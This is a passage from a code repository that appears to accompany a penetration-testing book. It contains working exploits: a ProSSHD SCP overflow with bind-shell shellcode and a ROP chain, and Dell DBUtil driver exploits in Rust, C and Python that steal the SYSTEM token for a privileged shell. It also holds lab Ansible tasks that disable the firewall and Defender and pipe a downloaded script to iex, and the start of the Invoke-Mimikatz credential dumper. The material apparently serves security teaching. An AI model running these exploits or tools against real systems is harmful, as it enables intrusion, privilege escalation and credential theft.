ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username, key_filename=None,
password=password)
sleep(20)
with SCPClient(ssh_client.get_transport(), sanitize=lambda x:x) as scp:
scp.put(scp, req)
================================================
FILE: ch13/prosshd_dep.py
================================================
#prosshd_dep.py
import paramiko
from scp import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.209.198"
username = "test1"
password = "asdf"
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
sc = b""
sc += b"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
sc += b"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
sc += b"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
sc += b"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
sc += b"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
sc += b"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
sc += b"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
sc += b"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
sc += b"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
sc += b"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
sc += b"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
sc += b"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
sc += b"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
sc += b"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
sc += b"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
sc += b"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
sc += b"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
sc += b"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
sc += b"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
sc += b"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
sc += b"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
sc += b"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
sc += b"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
sc += b"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
sc += b"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69"
# ROP chain generated by Mona.py, along with fixes to deal with alignment.
rop = struct.pack('<L',0x7c349614) # RETN, skip 4 bytes [MSVCR71.dll]
rop += struct.pack('<L',0x7c34728e) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xfffffcdf) # Value to add to EBP,
rop += struct.pack('<L',0x7c1B451A) # ADD EBP,EAX # RETN
rop += struct.pack('<L',0x7c34728e) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xfffffdff) # Value to negate, will become 0x00000201
rop += struct.pack('<L',0x7c353c73) # NEG EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c34373a) # POP EBX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x7c345255) # INC EBX # FPATAN # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c352174) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c344efe) # POP EDX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L',0x7c351eb1) # NEG EDX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c36ba51) # POP ECX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c38f2f4) # &Writable location [MSVCR71.dll]
rop += struct.pack('<L',0x7c34a490) # POP EDI # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c346c0b) # RETN (ROP NOP) [MSVCR71.dll]
rop += struct.pack('<L',0x7c352dda) # POP ESI # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c3415a2) # JMP [EAX] [MSVCR71.dll]
rop += struct.pack('<L',0x7c34d060) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c37a151) # ptr to &VirtualProtect() [IAT MSVCR71.dll]
rop += struct.pack('<L',0x7c378c81) # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c345c30) # ptr to 'push esp # ret ' [MSVCR71.dll]
req = b"\x41" * 492
nop = b"\x90" * 200
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username, key_filename=None, password=password)
sleep(2)
with SCPClient(ssh_client.get_transport(), sanitize=lambda x:x) as scp:
scp.put(scp, req+rop+nop+sc)
================================================
FILE: ch14/dbutil_exploit/Cargo.toml
================================================
[package]
name = "dbutil"
version = "0.1.0"
edition = "2018"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
winapi = {version = "0.3", features = ["fileapi", "ioapiset", "libloaderapi", "psapi", "winnt"]}
hex = "0.4"
================================================
FILE: ch14/dbutil_exploit/src/bin/exploit.rs
================================================
use dbutil::{get_kernel_base, open_dev, read_ptr, write_ptr};
use winapi::um::libloaderapi::{GetProcAddress, LoadLibraryA};
const PID_OFFSET: usize = 0x440;
const APLINKS_OFFSET: usize = 0x448;
const TOKEN_OFFSET: usize = 0x4B8;
fn main() {
let hdev = unsafe { open_dev() };
let lpisp = unsafe {
let hkernel = LoadLibraryA("ntoskrnl.exe\0".as_ptr() as _);
let local_isp = GetProcAddress(hkernel, "PsInitialSystemProcess\0".as_ptr() as _);
local_isp as usize - hkernel as usize + get_kernel_base()
};
std::io::Read::read(&mut std::io::stdin(), &mut [0u8]).unwrap();
let isp = read_ptr(hdev, lpisp);
let systoken = read_ptr(hdev, isp + TOKEN_OFFSET);
let mut curproc = isp;
let mypid = std::process::id();
let mut curpid = 0;
while curpid != mypid {
curproc = read_ptr(hdev, curproc + APLINKS_OFFSET);
curproc -= APLINKS_OFFSET;
curpid = read_ptr(hdev, curproc + PID_OFFSET) as _;
}
write_ptr(hdev, curproc + TOKEN_OFFSET, systoken);
std::process::Command::new("cmd.exe").spawn().unwrap();
}
================================================
FILE: ch14/dbutil_exploit/src/bin/ioctlcall.rs
================================================
use dbutil::{ioctl, open_dev};
fn main() {
let hdev = unsafe { open_dev() };
let args: Vec<String> = std::env::args().collect();
let code =
u32::from_str_radix(&args[1].trim_start_matches("0x"), 16).expect("Bad ioctl number");
let mut buf = hex::decode(&args[2]).expect("Bad hex buf");
unsafe { ioctl(hdev, code, buf.as_mut_ptr() as _, buf.len()) };
println!("Output: {}", hex::encode(&buf));
}
================================================
FILE: ch14/dbutil_exploit/src/lib.rs
================================================
use std::mem::size_of;
use std::ptr::null_mut;
use winapi::um::{fileapi::*, ioapiset::*, psapi::*, winnt::*};
#[repr(C)]
#[derive(Default)]
struct DbMemmove {
key: u64,
ptr: usize,
offset: u32,
pad: u32,
data: usize,
}
pub unsafe fn open_dev() -> HANDLE {
CreateFileA(
"\\\\.\\DBUtil_2_3\0".as_ptr() as _,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
null_mut(),
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
null_mut(),
)
}
pub unsafe fn ioctl(dev: HANDLE, num: u32, iobuf: PVOID, buflen: usize) -> bool {
DeviceIoControl(
dev,
num,
iobuf,
buflen as _,
iobuf,
buflen as _,
null_mut(),
null_mut(),
) != 0
}
pub fn read_ptr(hdev: HANDLE, ptr: usize) -> usize {
let mut mc = DbMemmove {
ptr,
..Default::default()
};
let mcptr = &mut mc as *mut DbMemmove;
if unsafe { !ioctl(hdev, 0x9B0C1EC4, mcptr as _, size_of::<DbMemmove>()) } {
panic!("Failed to read {:#x}", ptr as usize);
}
mc.data
}
pub fn write_ptr(hdev: HANDLE, ptr: usize, content: usize) {
let mut mc = DbMemmove {
ptr,
data: content,
..Default::default()
};
let mcptr = &mut mc as *mut DbMemmove;
if unsafe { !ioctl(hdev, 0x9B0C1EC8, mcptr as _, size_of::<DbMemmove>()) } {
panic!("Failed to write {:#x}", ptr as usize);
}
}
pub unsafe fn get_kernel_base() -> usize {
let mut needed: u32 = 0;
let mut namebuf = vec![0u8; 260];
EnumDeviceDrivers(null_mut(), 0, &mut needed);
let mut bases = vec![0usize; (needed as usize / size_of::<usize>()) as _];
EnumDeviceDrivers(bases.as_mut_ptr() as _, needed, &mut needed);
for base in bases.into_iter() {
let len =
GetDeviceDriverBaseNameA(base as _, namebuf.as_mut_ptr() as _, namebuf.len() as _);
if "ntoskrnl.exe" == std::str::from_utf8(&namebuf[..len as _]).unwrap() {
return base;
}
}
panic!("Could not find kernel base");
}
================================================
FILE: ch14/dbutil_exploit.c
================================================
#include <windows.h>
#pragma comment(lib, "psapi.lib")
const unsigned long PID_OFFSET = 0x440;
const unsigned long APLINKS_OFFSET = 0x448;
const unsigned long TOKEN_OFFSET = 0x4B8;
struct DbMemcpy {
DWORD64 key;
ULONG_PTR ptr;
DWORD offset;
DWORD pad;
BYTE content[0];
};
BOOL read(HANDLE hdev, ULONG_PTR ptr, DWORD size, LPVOID out) {
SIZE_T bufsz = sizeof(struct DbMemcpy) + size;
struct DbMemcpy* db = (struct DbMemcpy*)calloc(1, bufsz);
db->ptr = ptr;
BOOL ret = DeviceIoControl(
hdev,
0x9B0C1EC4,
db,
bufsz,
db,
bufsz,
NULL,
NULL
);
if (TRUE == ret){
memcpy(out, db->content, size);
}
free(db);
return ret;
}
BOOL write(HANDLE hdev, ULONG_PTR ptr, BYTE* content, DWORD size) {
SIZE_T bufsz = sizeof(struct DbMemcpy) + size;
struct DbMemcpy* db = (struct DbMemcpy*)calloc(1, bufsz);
db->ptr = ptr;
memcpy(db->content, content, size);
BOOL ret = DeviceIoControl(
hdev,
0x9B0C1EC8,
db,
bufsz,
db,
bufsz,
NULL,
NULL
);
free(db);
return ret;
}
BOOL read_ptr(HANDLE hdev, ULONG_PTR src, ULONG_PTR* out) {
return read(hdev, src, sizeof(LPVOID), (LPVOID)out);
}
BOOL write_ptr(HANDLE hdev, ULONG_PTR dst, ULONG_PTR val) {
return write(hdev, dst, (LPVOID)&val, sizeof(LPVOID));
}
LPVOID get_kernel_base() {
DWORD lpcbNeeded = 0;
LPVOID* bases = NULL;
CHAR namebuf[MAX_PATH] = {0};
LPVOID ret = NULL;
EnumDeviceDrivers(NULL, 0, &lpcbNeeded);
bases = malloc(lpcbNeeded);
EnumDeviceDrivers(bases, lpcbNeeded, &lpcbNeeded);
for (int i = 0; i < lpcbNeeded / sizeof(LPVOID); i++) {
GetDeviceDriverBaseNameA(bases[i], namebuf, MAX_PATH);
if (!stricmp(namebuf, "ntoskrnl.exe")) {
ret = bases[i];
break;
}
}
free(bases);
return ret;
}
int main(int argc, char** argv) {
ULONG_PTR isp, systoken, curproc, lpisp;
DWORD64 mypid = (DWORD64)GetCurrentProcessId(), curpid = 0;
LPVOID kernel_base = get_kernel_base();
HANDLE hdev = CreateFileA(
"\\\\.\\DBUtil_2_3",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
HMODULE hkernel = LoadLibraryA("ntoskrnl.exe");
lpisp = (ULONG_PTR)GetProcAddress(hkernel, "PsInitialSystemProcess") -
(ULONG_PTR)hkernel + (ULONG_PTR)kernel_base;
read_ptr(hdev, lpisp, &isp);
read_ptr(hdev, isp+TOKEN_OFFSET, &systoken);
curproc = isp;
while (curpid != mypid) {
read_ptr(hdev, curproc+APLINKS_OFFSET, &curproc);
curproc -= APLINKS_OFFSET;
read_ptr(hdev, curproc+PID_OFFSET, (ULONG_PTR*)&curpid);
}
write_ptr(hdev, curproc+TOKEN_OFFSET, systoken);
system("cmd.exe");
return 0;
}
================================================
FILE: ch14/dbutil_exploit.py
================================================
from ctypes import (
windll,
LittleEndianStructure,
POINTER,
byref,
cast,
sizeof,
c_uint64,
c_ubyte,
memmove,
)
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
from functools import partial
import os
gle = windll.kernel32.GetLastError
# ctypes errcheck functions
def errcheck_bool(res, func, args):
if not res:
raise Exception("{} failed. GLE: {}".format(func.__name__, gle()))
return res
def errcheck_drivername(res, func, args):
if res == 0:
raise Exception("{} failed. GLE: {}".format(func.__name__, gle()))
if res == args[2]:
raise Exception(
"{} failed. Buffer too short. GLE: {}".format(func.__name__, gle())
)
return res
def errcheck_createfile(res, func, args):
if res == HANDLE(-1).value: # INVALID_HANDLE_VALUE
raise Exception("Failed to open device {}. GLE: {}".format(args[0], gle()))
return res
# functions
GetProcAddress = windll.kernel32.GetProcAddress
LoadLibraryA = windll.kernel32.LoadLibraryA
CreateFileA = windll.kernel32.CreateFileA
DeviceIoControl = windll.kernel32.DeviceIoControl
GetDeviceDriverBaseNameA = windll.Psapi.GetDeviceDriverBaseNameA
EnumDeviceDrivers = windll.Psapi.EnumDeviceDrivers
# param/return types
GetProcAddress.restype = LPVOID
GetProcAddress.argtypes = [LPVOID, LPCSTR]
LoadLibraryA.restype = LPVOID
LoadLibraryA.argtypes = [LPCSTR]
CreateFileA.restype = HANDLE
# we won't use LPSECURITY_ATTRIBUTES (arg 4) so just use LPVOID
CreateFileA.argtypes = [LPCSTR, DWORD, DWORD, LPVOID, DWORD, DWORD, HANDLE]
CreateFileA.errcheck = errcheck_createfile
DeviceIoControl.restype = BOOL
# we won't use LPOVERLAPPED (arg 8) so just use LPVOID
DeviceIoControl.argtypes = [
HANDLE,
DWORD,
LPVOID,
DWORD,
LPVOID,
DWORD,
POINTER(DWORD),
LPVOID,
]
DeviceIoControl.errcheck = errcheck_bool
GetDeviceDriverBaseNameA.restype = DWORD
GetDeviceDriverBaseNameA.argtypes = [LPVOID, LPCSTR, DWORD]
GetDeviceDriverBaseNameA.errcheck = errcheck_drivername
EnumDeviceDrivers.restype = BOOL
EnumDeviceDrivers.argtypes = [LPVOID, DWORD, POINTER(DWORD)]
EnumDeviceDrivers.errcheck = errcheck_bool
# constants
GENERIC_READ = 1 << 30
GENERIC_WRITE = 1 << 31
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80
"""
dt _EPROCESS
nt!_EPROCESS
+0xXXX UniqueProcessId : Ptr64 Void
+0xYYY ActiveProcessLinks : _LIST_ENTRY
+0xZZZ Token : _EX_FAST_REF
"""
pid_off = 0x440
aplinks_off = 0x448
token_off = 0x4B8
key = 0
def GetProcAddressAbsolute(hmodule, realbase, symbol):
"""get the absolute address of a symbol in memory"""
return GetProcAddress(hmodule, symbol) - hmodule + realbase
class DbMemcpy(LittleEndianStructure):
"""Memcpy arg structure that the driver expects for input"""
_fields_ = [("key", c_uint64), ("ptr", LPVOID), ("offset", DWORD), ("pad", DWORD)]
def _read(hdev, ptr, size):
mc = DbMemcpy(key, cast(ptr, LPVOID), 0, 0)
buflen = sizeof(mc) + size
# need a mutable buffer
buf = (c_ubyte * buflen)()
memmove(buf, bytes(mc), sizeof(mc))
DeviceIoControl(
hdev, 0x9B0C1EC4, byref(buf), buflen, byref(buf), buflen, None, None
)
return bytes(buf)[sizeof(mc) :]
def _write(hdev, ptr, contents):
mc = DbMemcpy(key, cast(ptr, LPVOID), 0, 0)
buf = bytes(mc) + contents
DeviceIoControl(hdev, 0x9B0C1EC8, buf, len(buf), buf, len(buf), None, None)
def get_driver_bases():
"""Return a dictionary of loaded kernel modules and their base addresses"""
lpcbNeeded = DWORD()
EnumDeviceDrivers(None, 0, byref(lpcbNeeded))
bases = (LPVOID * int(lpcbNeeded.value / sizeof(LPVOID)))()
EnumDeviceDrivers(byref(bases), lpcbNeeded, byref(lpcbNeeded))
drvbuf = LPSTR(b"\x00" * 260) # max path should be enough
ret = dict()
for base in bases:
if not base:
continue
GetDeviceDriverBaseNameA(base, drvbuf, 260)
ret[drvbuf.value] = base
return ret
# 1. Enumerate drivers, get kernel name and base address
drivers = get_driver_bases()
krnlname = b"ntoskrnl.exe"
krnlbase = drivers[krnlname]
# 2. Open the device that gdrv creates
hdb = CreateFileA(
b"\\\\.\\DBUtil_2_3",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
None,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
None,
)
read = partial(_read, hdb)
write = partial(_write, hdb)
read_ptr = lambda addr: int.from_bytes(read(addr, 8), "little")
write_ptr = lambda addr, val: write(addr, val.to_bytes(8, "little"))
# 3. Find system’s EPROCESS structure, get the system token
hkernel = LoadLibraryA(krnlname)
lpisp = GetProcAddressAbsolute(hkernel, krnlbase, b"PsInitialSystemProcess")
isp = read_ptr(lpisp)
systoken = read_ptr(isp + token_off)
systoken &= ~0b1111
print("System token: " + hex(systoken))
# 4. Find the current process’s EPROCESS structure
mypid = os.getpid()
curpid = 0
curproc = isp
while curpid != mypid:
curproc = read_ptr(curproc + aplinks_off)
curproc -= aplinks_off
curpid = read_ptr(curproc + pid_off)
print("Got curproc eprocess address = 0x{:08x}".format(curproc))
# 5. Back up the current token, copy the system token to the current process’s
# token field
oldtoken = read_ptr(curproc + token_off)
write_ptr(curproc + token_off, systoken)
# 6. Execute a program, restore the current process’s saved token
os.system("powershell.exe")
print("Done. Repairing.")
write_ptr(curproc + token_off, oldtoken)
================================================
FILE: ch14/ioctlcall.py
================================================
from ctypes import windll, POINTER, byref
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
gle = windll.kernel32.GetLastError
# ctypes errcheck functions
def errcheck_bool(res, func, args):
if not res:
print("{} failed. GLE: {}".format(func.__name__, gle()))
return res
def errcheck_createfile(res, func, args):
if res == HANDLE(-1).value: # INVALID_HANDLE_VALUE
raise Exception("Failed to open device {}. GLE: {}"
.format(args[0], gle()))
return res
DeviceIoControl = windll.kernel32.DeviceIoControl
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
DeviceIoControl.restype = BOOL
# we won't use LPOVERLAPPED (arg 8) so just use LPVOID
DeviceIoControl.argtypes = [HANDLE, DWORD, LPVOID, DWORD, LPVOID, DWORD,
POINTER(DWORD), LPVOID]
DeviceIoControl.errcheck = errcheck_bool
CreateFileA.restype = HANDLE
# we won't use LPSECURITY_ATTRIBUTES (arg 4) so just use LPVOID
CreateFileA.argtypes = [LPCSTR, DWORD, DWORD, LPVOID, DWORD, DWORD, HANDLE]
CreateFileA.errcheck = errcheck_createfile
CloseHandle.restype = BOOL
CloseHandle.argtypes = [HANDLE]
# constants
GENERIC_READ = (1 << 30)
GENERIC_WRITE = (1 << 31)
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80
def opendevice(dev):
# open the device
hdev = CreateFileA(dev, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, None)
return hdev
def ioctl(hdev, ioctl, input, outbuf_len):
outbuf = LPSTR(b"\x00" * outbuf_len) if outbuf_len else None
outret = DWORD()
DeviceIoControl(hdev, ioctl, input, len(input), outbuf, outbuf_len,
byref(outret), None)
return outret.value, (outbuf.value if outbuf else b'')
if __name__ == '__main__':
import argparse
import sys
def _buf_or_stdin(arg):
if arg == "-":
return sys.stdin.read().encode()
return bytes.fromhex(arg)
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--device', required=True, help="Device to open",
type=lambda x: x.encode())
ap.add_argument('-i', '--ioctl', required=True, help="IOCTL to invoke",
type=lambda x: int(x, 0))
ap.add_argument('-b', '--buffer', type=_buf_or_stdin, default=b"",
help="Input buffer as hex (- for raw from stdin)")
ap.add_argument('-o', '--output-buffer-length', default=0,
type=lambda x: int(x, 0), help="Output buffer length")
ap.add_argument('-m', '--match-input-output', action='store_true',
help="Make output buffer size input buffer size")
args = ap.parse_args()
print("Device: {}\nIOCTL: 0x{:x}".format(args.device.decode(), args.ioctl))
print("Input buffer: {}".format(args.buffer.hex()))
if args.match_input_output:
args.output_buffer_length = len(args.buffer)
hdev = opendevice(args.device)
ret, buf = ioctl(hdev, args.ioctl, args.buffer, args.output_buffer_length)
CloseHandle(hdev)
print("Return value: {}\nOutput Buffer length: {}\nOutput Buffer: {}"
.format(ret, len(buf), buf.hex()))
================================================
FILE: ch15/Lab/ansible/ansible.cfg
================================================
[defaults]
host_key_checking = False
================================================
FILE: ch15/Lab/ansible/ch15_playbook.yml
================================================
---
- hosts: target
roles:
- common
- target_customizations
vars_files:
- vars/vars.yml
- hosts: kali
become: yes
roles:
- kali_customizations
vars_files:
- vars/vars.yml
================================================
FILE: ch15/Lab/ansible/roles/common/defaults/main.yml
================================================
---
================================================
FILE: ch15/Lab/ansible/roles/common/handlers/main.yml
================================================
---
================================================
FILE: ch15/Lab/ansible/roles/common/meta/main.yml
================================================
---
galaxy_info:
role_name: install_misc_software
author: Russ Nolen rnolen@splunk.com
description: Install some basic software
license: BSD
min_ansible_version: 2.4
platforms:
- name: Windows
versions:
- 2012R2
- Win10
galaxy_tags:
- system
- security
dependencies: []
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/chocolatey-components.yml
================================================
---
- name: Install Chocolately via Powershell
win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
"
- name: Install notepadplusplus
win_chocolatey:
name: notepadplusplus
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/main.yml
================================================
---
# need to wrap an if statement around this one
# make it windows specific
- name : Disable Windows Firewall
win_firewall:
state: disabled
- include: chocolatey-components.yml
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/windows-components.yml
================================================
---
- name: Install the Visual C++ Redistributable
win_package:
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
arguments: /install /passive /norestart
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
================================================
---
- name: Disable Windows Defender
win_regedit:
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
value: DisableRealTimeMonitoring
datatype: dword
data: 1
================================================
FILE: ch15/Lab/ansible/roles/kali_customizations/files/Invoke-Mimikatz.ps1
================================================
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.0 alpha (12/14/2015)
.DESCRIPTION
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
functionality provided with Mimikatz.
.PARAMETER DumpCreds
Switch: Use mimikatz to dump credentials out of LSASS.
.PARAMETER DumpCerts
Switch: Use mimikatz to export all private certificates (even if they are marked non-exportable).
.PARAMETER Command
Supply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz "privilege::debug exit" as an example.
.PARAMETER ComputerName
Optional, an array of computernames to run the script on.
.EXAMPLE
Execute mimikatz on the local computer to dump certificates.
Invoke-Mimikatz -DumpCerts
.EXAMPLE
Execute mimikatz on two remote computers to dump credentials.
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
.EXAMPLE
Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
.NOTES
This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY
Find Invoke-ReflectivePEInjection at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection
Find mimikatz at: http://blog.gentilkiwi.com
.LINK
http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
#>
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "DumpCreds", Position = 1)]
[Switch]
$DumpCreds,
[Parameter(ParameterSetName = "DumpCerts", Position = 1)]
[Switch]
$DumpCerts,
[Parameter(ParameterSetName = "CustomCommand", Position = 1)]
[String]
$Command
)
Set-StrictMode -Version 2
$RemoteScriptBlock = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$PEBytes64,
[Parameter(Position = 1, Mandatory = $true)]
[String]
$PEBytes32,
[Parameter(Position = 2, Mandatory = $false)]
[String]
$FuncReturnType,
[Parameter(Position = 3, Mandatory = $false)]
[Int32]
$ProcId,
[Parameter(Position = 4, Mandatory = $false)]
[String]
$ProcName,
[Parameter(Position = 5, Mandatory = $false)]
[String]
$ExeArgs
)
###################################
########## Win32 Stuff ##########
###################################
Function Get-Win32Types
{
$Win32Types = New-Object System.Object
#Define all the structures/enums that will be used
# This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
############ ENUM ############
#Enum MachineType
$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
#Enum MagicType
$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
#Enum SubSystemType
$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
